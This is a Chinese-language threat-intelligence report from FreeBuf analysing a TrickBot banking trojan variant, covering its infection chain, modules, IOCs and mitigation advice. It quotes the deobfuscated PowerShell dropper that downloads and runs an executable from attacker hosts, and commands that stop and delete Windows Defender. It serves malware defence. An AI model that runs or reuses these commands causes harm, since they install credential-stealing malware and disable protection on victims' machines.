freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

威胁预警 | TrickBot银行木马归来袭击全球金融机构
2018-07-23 16:31:52

一、背景

最近国外安全研究人员发现TrickBot银行木马最新的样本,深信服EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细分析,确认此样本为TrickBot银行盗号木马的最新变种样本,并且此样本非常活跃,最近一段时间更新非常频繁。

TrickBot银行木马是一款专门针对各国银行进行攻击的恶意样本,它之前被黑客团伙用于攻击全球多个国家的金融机构,主要是通过垃圾邮件的方式进行攻击,此次发现的样本会对全球数百家大型银行网站进行攻击,部分银行列表如下:

图片1.png二、样本运行流程

图片.png

三、样本分析

邮件附件DOC样本(重命名为Trickbot.doc),如下所示:

图片.png

打开文档之后,如下所示:

图片.png分析DOC文件档,发现里面包含VBA宏代码,如下所示:

图片.png通过VBA宏编辑器解析DOC文档中的宏代码,如下所示:

图片.png动态调试解密里面的宏代码,通过CMD /C执行如下PowerShell脚本:

powershell "function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],'%temp%\[随机名].exe');

start-process '%temp%\[随机名].exe';}

try{[随机名]('http://whitakerfamily.info/ico.ico')}catch{[随机名]('http://rayanat.com/ico.ico')}

通过powershell脚本下载相应的TrickBot恶意程序,并执行。

TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:

图片.png

1.读取样本相应的资源数据到内存中,如下所示:

图片.png

资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:

图片.png

2.创建窗口,发送消息,如下所示:

图片.png3.对获取到的资源数据进行加解密相关操作,如下所示:

图片.png从程序中导入密钥1,如下所示:

图片.png

从程序中导入密钥2,如下所示:

图片.png最后通过CryptEncrypt对数据进行操作,如下所示:

图片.png

执行之后,在内存中将资源数据还原为一个Payload的数据,如下所示:

图片.png

4.然后在内存加载还原出来的payload数据,如下所示:

图片.png

5.还原出来的payload其实是一个DLL,内存加载DLL,如下所示:

图片.png定位到DLL的入口点:10001900处,如下所示:

图片.png6.判断DLL的入口函数是否为shellcode_main,如下所示:

图片.png

Payload分析

1.获取相应的函数地址,如下所示:

图片.png

2.通过检查程序的运行路径,启动父进程文件,如下所示:

图片.png

3.然后向启动的父进程中,注入相应的代码如下所示:

图片.png

4.检测操作系统版本,后面会根据操作系统版本下载相应的恶意文件,如下所示:

图片.png

5.将程序中包含的PE代码,注入到父进程中,提取出来的PE代码,如下所示:

图片.png

6.关闭Windows Defender软件,使用如下命令:

cmd.exe sc stop WinDefend

cmd.exe sc delete WinDefend

删除Windows Defender服务之后,如下所示:

图片.png

7.创建windows任务计划,实现自启动功能,如下所示:

图片.png

启动相应的母体样本程序,如下所示:

图片.png

8.拷贝自身到%appdata%\msscsc目录下TsickCot.exe程序,然后启动自身,并拉起SVCHOST.EXE进程,将恶意代码注入到多个SVCHOST.EXE进程中,然后执行,如下所示:

图片.png

从网上下载多个恶意文件,如下所示:

图片.png

启动五个相应的SVCHOST.EXE进程,如下所示:

图片.png

下载了五个相应的模块,Modules目录下的文件,如下所示:

图片.png

如果机器为64位的机器,则下载64位的相应的模块,如下所示:

图片.png

相应的配置文件信息如下:

图片.png图片.png图片.png

不同的SVCHOST进程,执行不同的功能,通过不同的配置文件。

(1)systeminfo32盗号用户主机系统,服务,安装程序等相关信息。

1.获取相应的函数地址信息,如下所示:

图片.png图片.png

2.获取计算机信息,收集用户系统版本、CPU信息、内存大小信息、软件安装信息、系统服务信息,如下所示:

图片.png

3.查询主机系统版本,如下所示:

图片.png

4.通过遍历注册表获取当前系统的安装程序信息,如下所示:

图片.png

5.查询主机相关信息,如下所示:

图片.png

6.查询主机进程相关信息,如下所示:

图片.png

(2)injectDll32盗取用户网银帐号

图片.png

1.检测相应的浏览器进程,如下所示:

图片.png

2.获取浏览器进程通信数据,如下所示:

图片.png

3.对浏览器进程,注入相关的代码,如下所示:

图片.png

4.根据配置文件相关信息,进行过滤,然后对浏览器进程进行HOOK,如下所示:

图片.png

HOOK之后的进程列表如下所示:

图片.png

5.解密出来的配置文件信息,如下所示:

dpost配置文件(由于文件太大,截取部分)

图片.pngsinj配置文件(由于文件太大,截取部分)

图片.png

dinj配置文件(由于文件太大,截取部分)

图片.png上面只是截取了配置文件部分银行列表,从配置文件上可以看出,涉及到全球几百家银行机构网站。

此样本的流量分析,从网上下载相应的TrickBot木马,如下所示:

图片.png

上传到恶意服务器的数据包,都是经过加密处理的,加密算法未知,如下所示:

图片.png

此银行木马最近非常活跃,版本也不断更新当中,主要针对全球银行金融机构进行攻击,样本涉及到的模块较多,功能比较复杂。

同时深信服EDR安全团队发现最近ZeusPandaBanker、Gozi、Pegasus、Ratopak、Ursnif等银行木马的变种家族都非常活跃,更新频繁,这些家族主要针对全球各大银行进行攻击。

四、解决方案

深信服EDR安全团队提醒广大用户:

1.不要点击来源不明的邮件附件,不从不明网站下载软件。

2.及时给主机打补丁,修复相应的高危漏洞。

3.对重要的数据文件定期进行非本地备份。

4.尽量关闭不必要的文件共享权限以及关闭不必要的端口,如:445,135,139,3389等。

5.RDP远程服务器等连接尽量使用强密码,不要使用弱密码。

6.安装专业的终端安全防护软件,为主机提供端点防护和病毒检测清理功能。

五、相关IOC

MD5

A8CD87036ECDDFBA234E3796D93FE667   ico.ico

5DFEA92F65755CF314180DB40596B9FE   injectDll32

A652BAD6746C739CC8E69B077E6ED396   injectDll64

B3A9D059584418A2A0803FB0C6753EA9   systeminfo32

5D4512296AA66BFC0F2AE610556D84F2   systeminfo64

30562B6FE4D8EFDCE3783CDD0909FFE6   networkDll32

F877C696C4082654FE64E135966FFCC6   mailsearcher32

3C0A14D3E4E5F1968434ECB017A4689B   importDll32

IP&URL:

94.103.81.144:447

82.202.221.78:443

90.69.224.122:443

82.202.221.163:447

185.13.39.197:443

94.103.81.144:447

109.234.39.42:447

188.124.167.132:8082

193.151.99.8:8082

162.249.229.101:8082

200.46.129.90:8082

70.79.178.120:8082

195.54.163.184:443

whitakerfamily.info 77.72.1.66

rayanat.com  104.244.127.60

http://37.230.116.249/response.php

此银行木马变种相关MD5样本:

00c783ed3ec30f1b13db8e4f0008d1d9

522f44d30d15f8d03ecbee8ffe512f29

2ad35fa357a1a13658d6107934be41cc

6124c863c08f92732da180d4cf7cbf38

d98badb54f293a925359e74dad2e05cd

24acb11ecc19c40410ad5f2572cb70d3

da50d3f3dcf8ab927b77ed72cf5682d9

2bcac6bd4ea7790a9f037a4038b9d6c4

f3cde217a20a854aafa1a991da04c138

9979eb8a5e2c4fd32938497e6d4f896b

8fc45b16bec114a0dbb2035be651952b

3d1958a4ce83ca967dc4318ef2fba83b

380dc556f2c6fa232c0a7a5140f91201

54bc795028a9a3f1467d8ba8a3f1f5a2

faad8b0e030701d6f54f32b552e12382

ea7d592a67a86b28f6ed0093ed5d0530

6d9cbb2a2213164613b5d1abb8b5e192

beac135dace12faa4d2a91a9d4a014fb

b7c16e0d9986e662d1becc2d295b6e01

4269f6d322adf8ca9cb5eb7621859d50

06b202b24e2490af0560cf6e90a3ece1

08f7bd9ef4eb5a7f41ece67bc5a71116

4686479cb1d5fad4672980d0f72c21ef

a469be02ff61bc09f6b6ddf0288912c7

c1a8adaebaecd0cccc10aef6c9c16bf2

d7a0d269eb3f024986e18b071b18b3f0

94da8818d83bccd75aeb2314ec5337d8

f7809b17ed9a8ec4082259079e4f617e

922f26076daf81c300e303f032541a47

df89c3bde71dbe11fdcd115db2d38ddc

f5192a4960fd5ef69032e78f4e8b38c9

a1c2e8e735590b030279af638c4da791

a5d2080603a74b92744cb08186be7324

2d9183ce82f6d4eff494fcc42a75b878

3a8812ce7d48b6ec713de3a5a0efe646

989a54e314933e620bb69a1e768405f4

38f8d8dce460c79e47ccf8d0559d5ecf

cbb0ce54b5eec9de6ed74a9d5f0ac537

9ab498fc22237101236fb0048709795b

de1ce3514f777178d672ee79ac398a74

c8289bd00c65aa98ee73507fd18b5b95

92c73d8750f7de2e535360fce16e6565

028e30f7b50fd2ab2cd9df91cd3fd66d

483c84066f957662d3f3e490898ad996

8cd3ba008c93327369b3d50341db8f74

3d017b71fa8ba996f251d121521cd0f7

f0370f160bfa8338f386a0bdf4d1b481

5919aabbf2a93c1f1c2f492a8dac755e

f9f9f5e74c4d24a5517a05bd5c2025eb

cfe7bdedf0b91c6bba2d720f75b73667

edccfe5ef48de6b0f3bbf53cc1012533

5e72f8a9dad93cf1dbe6e2d4d3cf3dee

fbab92e484dbf4e22e8b32e8a0a14f3a

f9c51b9ddc15e9625aec2fba4deb4d7a

a6b15ca41e52fcb7bf3dc5941af950fe

7980226010f02292d8cbac440c9c0443

44de98af8b6588ea597cdc95844fdda6

8e957840019b780a52f87c4176afcf43

96985dff8be2912fe2d02752b5d4a073

a6dce7423960304106b6ad8d7f7d9fad

c2d2cff7e78292637f831aa97d2ffb0f

837117ca7de80b18182d1ecc38a83faa

fad828733cde4018d2f7dcdc6e2e4bae

eaf0e8ad1f63831108cae73b20b7b0c8

f0bd265c4732a39c800c7f36c4f6d5cc

dae500bf3c3d02a2e7a4baa07ef349f7

40d8ce3c2b8f49798a882b6c34f6c315

c1e3c3dd57654f19676e446474bbdd92

609f7242b99358225b30c587f1186554

a662cfe0c40942412fcc8e71912305fc

227c63dbba61806ba3833f1f30516f22

d2d7a0384f6a5e4e7a2eb59a5f4488da

6b7cd6c2712542857f131349c772c9dd

dd8039995c5c218eae97b0bd1f2e65b0

35464492a9b2e63ac10e12d3babc89a7

c479099e2934e284e4bcd3c5b75beab0

284eca5253a65e73b5c0d805b5b5cd0d

7e300630af2923f0ca5c79811993e982

7a0f9608b48ba4838c24b864fd76ade5

88cd706ce6cbadc7e1722b1fcea7de41

0bd3aa3b71b481e47ca40b4497b7a8c3

73582cd6bd542a34fa36a6a8c768307c

0dc94f956e517ea69f4a3cd623bebb59

90eeed0624377283c4051f75e3752494

79d737143963888a824c35d09d6b0926

5f3969937055daddfb338dbcda32c518

80205bfb1c9ad950012378b69413630d

d1e66c20f3d6e756bd7f3cde6d560a4d

9b4bceda48cbd1ea5a848797e909dcbf

fabfc503eb52ce5d44363bfa139aed69

77bfe45f5991d36830c1ecd2d5311e6b

8c1933fe2278e15299158ec894abfc78

65c0910b047c11038ea5b723b43a6647

781a966bd0cf5fc4059d5670a5c8dfb5

72284c43ec4d9ff61c78970fef9b6c4b

6f2b25443630928d3408f35174898979

a2266baca1e5c71209f6c957af18e3f4

7302c18f5015740f7dbab389fbb71196

c4634916686ad740e1d17f23721152e2

c8faa8cb0e2412421c7263936f6734ea

6024143edd8331063a2b1af6fffbe0c0

c52cba3359ef8b900b25dd81ec5df47d

60be89cfcec7b0f485bba11b53df8d4c

7c728c2d9b9e1f5518aa6013db02cc0b

3d55d71c3f0655837694ea125687e479

3865ad4479d2e21b84e751044bf94c76

74227f2c7fc61aac5209a70d0e2d68f0

4598fe6c73be9f241006dfb35a76704a

9a163fa52d9cdd9f9c5e7b1549233b4d

3d3e08ad3a8f3b35b9a10aa6c57b290f

e35e2ac95a98d7a0651f4991837c36de

3ae26d6afc281d10592543c9bbd7560d

8fed59d5bc87c3b5794bca3e519ff2f4

# 木马 # 银行木马
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者